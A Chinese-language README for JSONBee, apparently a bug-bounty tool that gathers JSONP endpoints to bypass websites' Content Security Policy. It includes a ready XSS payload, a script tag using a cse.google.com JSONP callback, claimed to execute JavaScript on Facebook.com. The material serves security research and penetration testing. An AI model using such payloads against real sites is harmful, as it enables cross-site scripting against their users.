一个随时可用的 JSONP 端点集合,帮助绕过不同网站的内容安全策略。
该工具在 2018 年基辅的 HackIT 大会上展示。演示文稿可在此处查看(不确定为什么幻灯片格式乱了 :D):https://www.slideshare.net/Hacken_Ecosystem/ebrahem-hegazy-bug-hunters-manual-for-bypassing-contentsecuritypolicy
该工具的主要思想是自动找到能帮助绕过目标网站内容安全策略的 JSONP 端点。JSONBee 接收一个 URL 名称(例如 https://www.facebook.com),解析 CSP(内容安全策略),并自动建议能够绕过 CSP 的 XSS 载荷。它主要专注于我在漏洞赏金狩猎活动中收集的 JSONP 端点,可用于绕过 CSP。
JSONBee 依赖 3 种方法来收集 JSONP 端点:
该工具尚未完全完成,我仍在添加一些验证和功能。但仓库将托管在此处,以便在工具准备就绪前任何人都能使用。
仓库包含可直接使用的载荷,能够绕过 Facebook.com、Google.com 等网站的 CSP。
绕过 Facebook.com 的内容安全策略:
Facebook.com 在其 CSP 策略(script-src 指令)中允许 *.google.com,因此以下载荷可以完美地在 Facebook.com 上执行 JavaScript:
"><script+src="https://cse.google.com/api/007627024705277327428/cse/r3vs7b0fcli/queries/js?callback=alert(1337)"></script>
如果你遇到一个网站,其 script-src 指令信任 jsonp.txt 文件中的任何域名,那么选取一个与该域名匹配的载荷,尽情享受吧 :)
欢迎大家贡献,添加使用 JSONP 端点/回调的网站链接,使仓库更大、更有利于漏洞猎人、渗透测试人员和安全研究人员。